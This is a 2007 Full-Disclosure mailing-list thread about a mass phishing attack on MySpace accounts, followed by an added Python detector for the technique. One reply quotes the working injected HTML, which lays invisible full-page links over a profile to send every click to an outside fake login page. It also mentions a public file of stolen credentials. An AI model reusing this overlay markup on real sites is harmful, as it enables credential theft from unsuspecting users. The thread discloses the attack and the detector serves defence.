
Re: [Full-disclosure] Grab a myspace credential



http://www.ninjahype.org/mov/

nameHREFTrack

-KF


wac wrote:
>
>
> On 1/16/07, *Deepan* <codeshepherd@xxxxxxxxx> wrote:
>
>     On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote:
>     > "but at some point all this abuse will likely start sending users off
>     > to another service. "
>     >
>     > that's only --if they know if they are being abused.. most of them are
>     > not coherent about any such issues..
>     >
>     >
>     >
>     > On 1/15/07, Kevin Pawloski <kpawloski@xxxxxxxxx> wrote:
>     >         The level of phishing sites targeting MySpace and bot related
>     It is not quite easy to fool 56000+ users using phishing sites. I wonder
>     how Mark is doing it.
>
>
>
> Hmm... Oh no, it is very easy, yes, very easy what he is doing. He left 
> some traces on some of the "cracked" accounts. I was expecting 
> somebody to comment earlier, since it's been a couple of hours since 
> the initial post.
>
> When you modify a profile you can add this to the data of the profile, 
> you know those HTML customizations. I found this on one of the 
> accounts that really got my attention a little bit more than the girl 
> of the account :P
>
> HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="http://marcolano.com/login/">
> <img style="border-width:0px;width:2024px; height:1768px;" src="http://x.myspace.com/images/clear.gif"></a>
> <a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="http://marcolano.com/login/">
> <img style="border-width:0px;width:2024px; height:1768px;" src="http://x.myspace.com/images/clear.gif"></a>
> <embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://www.../mov/cid_3277_f.mov" width="1" height="1">
>
> As you might see, this creates a huge invisible link in the page in 
> front of everything, so when you click into anything on the page like 
> a link or anything it will take you to that phishing website so ppl 
> believe that the account expired and enter their user+pass. Now I 
> believe that his message was a way to tell about a BUG in myspace that 
> should filter that content and it is not doing it. So... we are in 
> fact not talking about a stupid phishing website for those who still 
> believe that.
>
> Regards
> Waldo
>
>
>     >          activity that has been targeting MySpace lately is pretty
>     >         alarming. Granted there is no real financial risk if an
>     >         account gets compromised for the user but at some point all
>     >         this abuse will likely start sending users off to another
>     >         service.
>     >
>     >         Kevin
>     >
>     >
>     >         On 1/15/07, North, Quinn <QNorth@xxxxxxx> wrote:
>     >                 "youmustbecompleteretards@xxxxxxxxx:doyouhonestlythinkiwillputmyrealpasswordhere"
>     >
>     >                 ...at least there is some hope left in the world :-\
>     >
>     >                 --=Q=--
>     >
>     >                 -----Original Message-----
>     >                 From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
>     >                 [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf Of Emma Perdue
>     >                 Sent: Monday, January 15, 2007 7:48 AM
>     >                 To: full-disclosure@xxxxxxxxxxxxxxxxx
>     >                 Subject: [Full-disclosure] Grab a myspace credential
>     >
>     >                 56000+ and counting
>     >
>     >                 http://www.marcolano.com/login/myspace.txt
>     >
>     >                 --
>     >                 *Emma aka TINK*
>     >
>     >                 _______________________________________________
>     >                 Full-Disclosure - We believe in it.
>     >                 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>     >                 Hosted and sponsored by Secunia - http://secunia.com/
>     >
>     --
>     -----------------------------------------------
>     Regards
>     Deepan Chakravarthy N
>     http://www.codeshepherd.com/
>     http://sudoku-solver.net/
>
>     I am a programmer by day,
>     I dig grave for other programmers by night.
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
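
The filter check Waldo says is missing, sketched as an added example; it is not part of the thread and not MySpace's code. It flags positioned anchors that wrap an oversized image and point off-site. The `TRUSTED_HOSTS` set, the `MAX_PX` threshold, the function names and the `.example` hosts in the constructed sample are all assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"myspace.com"}  # assumption: hosts the site itself controls
MAX_PX = 600                     # assumption: larger linked images are suspicious

def parse_style(attrs):
    """Turn an inline style attribute into a {property: value} dict."""
    props = {}
    for decl in (dict(attrs).get("style") or "").split(";"):
        if ":" in decl:
            name, value = decl.split(":", 1)
            # drop a trailing "!important" so "absolute !important" still matches
            props[name.strip().lower()] = value.split("!")[0].strip().lower()
    return props

def px(value):  # pixel length as int; other units are ignored by this sketch
    m = re.fullmatch(r"(\d+)px", value or "")
    return int(m.group(1)) if m else 0

class OverlayFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.anchor = None    # (href, positioned) for the currently open <a>
        self.findings = []
    def handle_starttag(self, tag, attrs):
        style = parse_style(attrs)
        if tag == "a":
            positioned = style.get("position") in ("absolute", "fixed")
            self.anchor = (dict(attrs).get("href") or "", positioned)
        elif tag == "img" and self.anchor:
            href, positioned = self.anchor
            host = urlparse(href).hostname or ""
            trusted = any(host == h or host.endswith("." + h) for h in TRUSTED_HOSTS)
            huge = max(px(style.get("width")), px(style.get("height"))) > MAX_PX
            if positioned and huge and host and not trusted:
                self.findings.append(href)
    def handle_endtag(self, tag):
        if tag == "a":
            self.anchor = None

def find_overlay_links(html):
    """Return hrefs of positioned anchors that wrap an oversized image."""
    finder = OverlayFinder()
    finder.feed(html)
    return finder.findings

# Constructed sample in the shape quoted above; hosts are placeholders.
SAMPLE = ('<a style="position: absolute;top:1px;left:1px;" href="http://phish.example/login/">'
          '<img style="border-width:0px;width:2024px; height:1768px;" src="http://cdn.example/clear.gif"></a>'
          '<a href="http://friend.example/"><img style="width:90px" src="http://cdn.example/me.jpg"></a>')
```

A profile filter would reject or strip markup for which `find_overlay_links` returns anything; sizes given in units other than `px` need their own rule.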